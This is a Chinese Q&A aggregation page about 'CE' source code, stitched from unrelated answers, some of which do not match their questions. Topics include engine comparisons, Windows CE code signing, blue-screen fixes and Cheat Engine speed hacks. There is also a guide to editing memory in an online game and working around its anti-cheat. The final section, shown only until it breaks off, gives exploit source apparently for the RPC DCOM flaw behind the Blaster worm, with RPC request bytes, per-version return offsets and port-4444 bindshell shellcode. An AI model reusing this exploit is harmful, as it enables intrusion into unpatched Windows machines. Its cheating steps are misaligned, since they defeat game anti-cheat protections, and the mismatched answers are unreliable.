ce3源碼

㈠ Unity3d，UDK 和 CE3 三者之間各有什麼優缺點如何選擇

不太了解CE3，
至於unity3d和UDK（其實現在應該是虛幻4了吧）
unity3d和虛幻4以及CE3現在都是免費的，但是虛幻4開放了源代碼下載。

unity3d的優點是上手容易，而且unity3d本身有asset store的商城，很多東西可以在商城上下載，這使得開發便利了許多。同時，跨平台也是unity3d的一大優點，目前在手機平台上佔有很大的份額。如果是個人開發的話，個人感覺Unity3d是最好的選擇了。順便一提，unity3d似乎沒有特別嚴苛的授權費用問題，似乎作品年收入10w美元以下是不需要向unity3d交錢的。
缺點在於unity3d並沒有像虛幻4和ce3那樣的高畫質，當然，由於Unity3d本身可以進行圖形編程，所以理論上也可以達到虛幻4和ce3的高度，但是畢竟不太容易，所以想要打造次時代大作還是放棄unity3d吧。

虛幻4的優點主要在於畫質和性能，很輕松地便可以得到非常好的畫面。為了競爭市場，虛幻4如今也是免費的，開發者只需要將製作所得的5%分給Epic，而且虛幻4另一大優勢在於它的源代碼是開放的，這意味著開發者可以根據自己的需要修改引擎，但是如果不是大型項目需要，這個優勢並不明顯。虛幻4引擎同樣有一個商城，但是跟unity3d比起來，內容實在是少的可憐了些。
虛幻4的缺點在於吃配置，不是所有的電腦都能很輕松的運行起來。而且雖然虛幻4也跨平台，但是手機平台上虛幻4的份額比較少，如果想要製作次時代的PC游戲，個人認為虛幻4是很好的選擇。

㈡ 高分求ce5.3的源碼，只要5.3，郵箱：[email protected]

5.3沒有了，有5。6的要嗎

㈢ 如何加密 Windows CE系統

椋‥XE、DLL、OCX）都能夠正常運行，存放在永久存儲器上的模塊在開發者數字簽名後也能夠運行，而沒有數字簽名的模塊則不能運行。讀者有興趣可以查看CE幫助文檔中標題為《Create a Trusted Environment》的文章。言簡意賅，下面就開始講解如何實現可信任環境。
1、得到鑰容器
得到鑰容器（key container）的方法是調用Win32 Security API。先得到CSP（cryptographic service provider），再得到key container。默認的CSP為Microsoft Base Cryptographic Provider。默認的key container以當前登錄用戶名為名稱。如果你熟悉加密方面知識的話可以另外調用其他CSP。在此我們以Microsoft Base Cryptographic Provider默認的key container為signfile需要的鑰容器。
2、對模塊簽名
signfile.exe 用於對模塊簽名。這個文件在CE安裝目錄里（包括源碼）可以找到，下面是參數說明：
-o 輸出簽名數據到指定的文件
-k 指定CAPI 鑰容器
-p 輸出公鑰到指定文件（內容為一個C語言數組）
-s 嵌入指定字元
-a 在指定的PE格式的文件中附加簽名數據
-f 要簽名的文件（EXE、DLL）
假如我們要將myproc.exe簽名，假設我們以fulinlin名字在桌面Windows上登錄，那麼在命令行輸入如下命令：
signfile -fmyproc.exe -a -kfulinlin -pmyproc.txt
上面參數告訴signfile.exe 用鑰容器fulinlin中的私鑰將文件myproc.exe簽名，並且將公鑰存放到名為myproc.txt的文件中。加密具體過程很復雜，我對加密不了解，只能理解到這么低級的程度。如果說錯了希望讀者指教。
3、編寫檢驗函數
編寫檢驗函數前請參考CE的幫助文檔中標題為《Verifying a Signature》的文章。我們只需要把這篇文章中最下面的代碼復制到CE安裝目錄下定義OEMInit函數的.c文件中。因為我的調試平台屬於X86系列，所以定義OEMInit函數是在cfwpc.c文件中。為了使讀者能夠簡單弄懂這個機制，我把相關函數、變數做一個簡單說明，如下：
////初始化公鑰函數[NextPage]extern BOOL InitPubKey(const BYTE *KeyBlob, DWORD cbKeyBlob);
/////這兩個指針是在loader.c文件中定義的，loader.c實現載入器的功能，載入模塊（EXE、DLL）。這兩個指針指向兩個函數，pOEMLoadInit
////指向的函數的功能是：每當載入一個模塊的時候這個函數決定是否需要驗證。TRUE表示需要，FALSE不需要。pOEMLoadMole指向的
////函數的功能是：驗證將要載入的模塊是否具有合法的簽名。有三個返回值，具體請看幫助文檔。
extern OEMLoadInit_t pOEMLoadInit; extern OEMLoadMole_t pOEMLoadMole;
/////以"CertifyMole"開頭的函數為系統自帶的驗證函數。有了這三個函數你就不用去了解加密知識了。
extern BOOL CertifyMoleInit(void); extern BOOL CertifyMole(PBYTE pbBlock, DWORD cbBlock);extern BOOL CertifyMoleFinal(PBYTE *ppbSignData, PDWORD pcbSignData);
注意公鑰數據g_bSignPublicKeyBlob，要把signfile導出的公鑰覆蓋代碼中原有的g_bSignPublicKeyBlob 。
[NextPage]4、編譯並測試用PB打開一個內核工程，進入命令行狀態（菜單open build release directory）。鍵入"build -c"和"sysgen i486oal"，因為cfwpc.c是i486oal.lib的一部分。之後重新編譯內核。
測試方法是把任何一個CE下運行的EXE復制一份，一份不改變，另一份由signfile簽名。然後把這兩個文件復制到永久存儲器上運行。測試結果簽名的能運行，而不簽名的不能運行（彈出對話框顯示"找不到XXX（或它的某一個組件）。

㈣ 誰能告訴我更改ce的標題的源代碼是哪個啊,

（一）藍屏由電腦操作引起：
1、回憶一下，藍屏前，進行了什麼操作？按F8進入安全模式，刪除、卸載、取消你之前的操作。
2、按F8進入安全模式，選擇「最後一次正確配置」或者「正常啟動」。
（二）藍屏由硬體引起：
1、更換或者添加硬體，出現硬體不兼容現象。卸下新加硬體。新加硬體兼容，也可能藍屏，因為系統不能識別新添加的硬體，建議重裝系統。
2、電腦使用過久，內存、顯卡的金手指被氧化而引起接觸不良。把內存、顯卡，取下來用橡皮擦擦卡的金手指，再向卡槽內加入少量無水酒精
（清洗槽內氧化物），幾分鍾後，用電吹風吹乾，再插好。
3、硬碟不穩定引起，此故障均為硬碟損壞，修復硬碟壞道或直接更換硬碟。
4、鍵鼠故障，重新插拔一下USB。

5、機箱內灰塵多引起，清除灰塵（一般3-5個月清除一次）。並卸下CPU風扇，輕輕擦去U上的硅脂，再重新塗上一薄層新硅脂。
6、超頻也可能引起電腦藍屏。如果超頻了，就取消超頻。
7、恢復BIOS設置。
（三）藍屏由軟體引起：
1、360修復引起。卸載360或重裝系統。
2、修復漏洞或殺毒引起。此故障均為操作不當，卸載補丁。
3、驅動精靈、驅動人生等軟體引起，但此類故障較少。因系統和顯卡驅動的兼容性不好（別追求新驅動，新的驅動有的並不適合你的顯卡），也會出現這樣的錯誤，建議更換適合的顯卡驅動安裝。
4、電腦中毒，使用專業殺毒軟體進行全盤殺毒，並把隔離區的文件刪除，重啟電腦，再進行一次查殺，防止二次病毒感染。
5、安裝了不穩定的軟體，建議全盤殺毒，卸載引發問題的軟體，重新安裝其他版本的軟體。

其實，電腦藍屏了，最好的解決方法是：重裝系統。如發現安裝的系統經常出現藍屏現象，則應該換個系統安裝。
如果是中毒後系統重裝，建議重裝系統後，先安裝殺毒軟體，進行一次徹底的全盤查殺後，再安裝其它軟體。
很高興為您解答：
你看下你電腦的藍屏代碼是什麼，才能更好的分析
1。電腦中存有病毒（打開電腦管家一殺毒一掃描查殺）如果殺到木馬或病毒後，應立即重啟， 重啟電腦後，來到「隔離|恢復」，徹底刪除，木馬和病毒！
2。電腦系統有頑固的病毒和木馬或蠕蟲干擾，或者丟失了系統文件（電腦管家的木馬查殺，打開電腦管家一殺毒一掃描查殺）

㈤ 怎麼寫像ce一樣修改進程速度的源碼求大神

工具：CE或ME或GE等內存修改工具步驟：1.進傳奇，切回桌面 比如我用的是CE那麼打開CE 在左上角有個電腦圖標打開它（滑鼠放在上面會提示打開進程）選擇Game2進程
2.切回遊戲 按F12 選戰斗 你會看見有游戲加速 攻擊加速 魔法加速 的條條 這里把魔法加速的數值隨意調節 比如我調3 然後切回桌面 在數值的下方輸入3 按回車或首次收索
3.你回發現地址欄突然多了許多地址（我們的加速地址就在其中) ,然後進游戲 把魔法加速調到另一個數值（這個要注意）比如我調到2 切回桌面在數值欄里輸入2 回車或按再次搜索
4.你回發現地址欄里的地址變少了這樣我們要查找的加速地址的范圍就減少了 在回到游戲調節一個不同的數值（就是不和你剛才輸入的相同即可.即我可以調為3或4或5或1但是最好別調為2） 然後切出來 輸入你剛才調節的數值 好了現在地址欄一般已經只剩下2到3個了在怎麼弄都是那幾個地址(若地址還很多在重復步驟調節-切出--輸入-回車-進游戲-調節...直到還剩那幾個地址)

㈥ 地下城與勇士的CE（改圖軟體）的源碼，我需要找到源碼自己做一個。誰有源碼

改1.25經驗：[attachment=63281][attachment=63282]
第1行的才是改圖的圖片
首先，大家要知道一個事情，MMD運行需要管理員許可權，大家可以打開始，注銷那裡看下自己的用戶名，然後在打開始，運行，打CMD，在控制台（也就是DOS里）打命令net user 你剛才看到的用戶名，如果不是ADMINISTRATORS組的，那不好意思，MMD你用不了。
2 MMD打開DNF也需要技巧，就是打開進程的時候必須選擇把以受限模式打開的勾選上，這個很重要，因為有TESSAFE，不這樣的話你可能會得到一個E文，說是無法打開。
3 今天偶開始的時候也老是改不出來，偶也覺得很奇怪，自己觀察了下內存，都是假數字。很多朋友說找到唯一地址了，也改不出圖或者修理什麼的，真正原因是TX又做了不知蝦米東西煙霧彈，改假地址當然進不去。怎麼判斷是否是改的假地址？比如說修理吧，賣是5，修是6是吧？ 如果你鎖定了某個地址，然後走遠了，發現這個地址不為0，還是5或者6，那肯定是假地址了。
解決方案也是有的，好多朋友粗心沒寫出來。偶看了下，必須把DNF和MMD都丟到360里，才能找出正確的數值
4 改圖出現XX的問題，這個問題我來告訴大家為什麼，出現XX就說明沒這個圖或者沒這個類型。
有個朋友發的改王圖說改255，那是錯誤的，正確的應該是改3，0是普通，1是冒險，2是勇士，3是王，改深淵前提你要先把深淵開下來，也就是說你先拿門票，然後把深淵點開，才能修改其他地方深淵。
5 改其他地圖問題，改其他地圖就是拿改王的地址，右鍵選16進制編輯器，然後自己看，在改地圖類型的前四個就是了
地圖表大家可以自己找。在發MMD的改王教程的那位兄弟的帖子里有，我就不轉了。
6 修改數值問題，好多人問我直接改了為什麼沒效果？呵呵，那是因為沒刷新。正確修改數值方法應該是，選中你要修改的數值
然後按右鍵，選擇修改，然後上面寫地圖代碼，下面是選擇類型。默認的是10進制，這也是為什麼好多兄弟教程里教大家把地圖的代碼表轉成10進制的原因。不會轉也沒關系，修改裡面下面的選擇類型里有HEX，就是16進制，把16進制的代碼表放進去，下面選擇HEX就OK了
7 修理/賣東西是沒問題。但是改地圖記得，進入不同區域的副本，其內存值是改變的，也就是說比如你在天空改的圖，有了內存地址了，你跑暗黑在改，地址就不對了，需要大家繼續搜索
8 關於加速的問題，MMD的加速在DNF里是無法使用的，但別忘記除了DNF，我們17網里還有好多其他的游戲，大家可以去其他的游戲里試試下，TX的游戲就算咯，還是那句話，TESSAFE不破，很牛X的東西就別想用工具改出來。
======================================================================
具體說下改深淵，一樣道理哈
比如你有天空的門票了，先去天空，隨便點個地圖，搜索好自己要搜索的地址，然後出來下，在進（怕時間不夠）
先選擇普通圖，把深淵點出來，然後把圖改成自己要去的圖和級別，OK，進吧，深淵出來了
PS： 一段時間米DNF了，也沒門票試驗了，這是老方法，大家可以自己嘗試，不過要記得，1：把深淵圖選出來 2身上要有門票
=======================================================
圖改出來進不去副本，請檢查一下自己的級別是否夠，材料是否夠？改圖不能幫你節省材料的，最多是改深淵圖可以用低級門票進高級深淵而已
======================================================================
第二，有人問改1.25經驗的
偶嘗試了下，其實很簡單，大家都知道改圖難度的代碼吧，0普通什麼的，那裡改成255（10進制）或者FF（16進制）就可以了，但是偶改了下，MS都是紅XX，直接進就可以了，不過如果求高經驗，可以先改成王圖，在改1.25倍經驗
第三，有人問找到的地址是00EF200C，確實，偶有時候也會改出這個來，這個就是TX的煙霧了，這個就是所謂的假地址。
請大家把MMD和DNF都從360啟動，然後在修改，如果還是出這個地址就換地方，一般偶改圖喜歡在最左邊那的
也就是下面圖的那個地方改，MS沒失敗過，如果碰到假地址，可以到偶改圖的位置試驗下
======================================================================
改1.25經驗：[attachment=63281][attachment=63282]
我是這樣做的，老樣子，搜出唯一地址後，再到MMD右側界面那裡，雙擊地址，將「修改的數值」一項改為3，然後將「鎖定時的數值」中的Exact Value 值修改為3，最後再將「修改的數值」改為255，進入即可。
注意的是，顯示和經驗都是王者圖的，但是路上沒有小BOSS之類的，而且BOSS不掉東西，我想因為是按照普通級別修改的緣故吧，所以想打裝備的話，還是不要修改了，要經驗的話，還是不錯的。
另MMD的開王者修理等方法大家去網上查就OK了，介紹很詳細

㈦ 如何查看exe文件的源代碼

需要准備的工具：電腦，反編譯工具ILSpy。

1、首先在網路上搜索下載反編譯工具ILSpy，解壓後如圖，雙擊.exe文件打開解壓工具。

㈧ 這種代碼怎麼才能得到

把你網頁的開頭這一段
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
改為<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

㈨ 易語言修改造夢西遊3攻擊力源碼

..com/question/577550491.html?fr=uc_push&push=keyword&entry=uhome_new&oldq=1

㈩ 誰幫我分析（注釋）下沖擊波源代碼。。註明個段代碼的功能。它是用什麼語言寫的我有C、C#編程基礎）

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char *targets [] =

{

"Windows NT SP4 (english)",

"Windows NT SP5 (chineese)",

"Windows NT SP6 (chineese)",

"Windows NT SP6a (chineese)",

"Windows 2000 NOSP (polish)",

"Windows 2000 SP3 (polish)",

"Windows 2000 SP4 (spanish)",

"Windows 2000 NOSP1 (english)",

"Windows 2000 NOSP2 (english)",

"Windows 2000 SP2-1 (english)",

"Windows 2000 SP2-2 (english)",

"Windows 2000 SP3-2 (english)",

"Windows 2000 NOSP (chineese)",

"Windows 2000 SP1 (chineese)",

"Windows 2000 SP2 (chineese)",

"Windows 2000 SP3 (chineese)",

"Windows 2000 SP4 (chineese)",

"Windows 2000 SP3 (german)",

"Windows 2000 NOSP (japaneese",

"Windows 2000 SP1 (japaneese)",

"Windows 2000 SP2 (japaneese)",

"Windows 2000 NOSP (korean)",

"Windows 2000 SP1 (korean)",

"Windows 2000 SP2 (korean)",

"Windows 2000 NOSP (mexican)",

"Windows 2000 SP1 (mexican)",

"Windows XP NOSP (english)",

"Windows SP1-2 (english)",

"Windows 2k3 (english)",

"Windows 2000 SP3 (german)",

"Windows 2000 SP4-1 (german)",

"Windows 2000 SP4-2 (german)",

"Windows XP SP1 (german)",

"Windows 2000 SERVER SP1 (french)",

"Windows 2000 SERVER SP4 (french)",

"Windows XP NOSP (french)",

"Windows XP SP1 (french)",

"Windows 2000 SP0 (english)",

"Windows 2000 SP1 (english)",

"Windows 2000 SP2 (english)",

"Windows 2000 SP3 (english)",

"Windows 2000 SP4 (english)",

"Windows XP SP0 (english)",

"Windows XP SP1-1 (english)",

"Windows XP SP2 (english)",

"Windows 2000 Advanced Server SP3 (english)",

"ALL/WINXP/WIN2K",

NULL

};

unsigned long offsets [] =

{

0x77e527f3,

0x77cfdaee,

0x77ac0ef0,

0x77c3eaf0,

0x774d3fe3,

0x77292ce4,

0x77133ba5,

0x777416e8,

0x772b49e2,

0x77b524e8,

0x775cfa2e,

0x772ae3e2,

0x778b89e6,

0x772b49e0,

0x77444342,

0x77294cdf,

0x777a882e,

0x77e527f3,

0x778b89e5,

0x772b49df,

0x772ae3e1,

0x778b89e5,

0x772b49df,

0x772ae3e1,

0x778b89e8,

0x77e3afe9,

0x77db37d7,

0x77b05422,

0x77292ce3,

0x77294ce0,

0x7756c2e2,

0x77fc18d4,

0x774b3ee4,

0x7756c2e2,

0x774a75d4,

0x77fc18d4,

0x77e81674,

0x77e829ec,

0x77e824b5,

0x77e8367a,

0x77f92a9b,

0x77e9afe3,

0x77e626ba,

0x77d737db,

0x77e2afc5,

0x010016C6

};

unsigned char sc[]=

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* return address */

"\xcc\xe0\xfd\x7f" /* primary thread data block */

"\xcc\xe0\xfd\x7f" /* primary thread data block */

/* port 4444 bindshell */

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"

"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"

"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"

"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"

"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"

"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"

"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"

"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"

"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"

"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"

"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"

"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"

"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"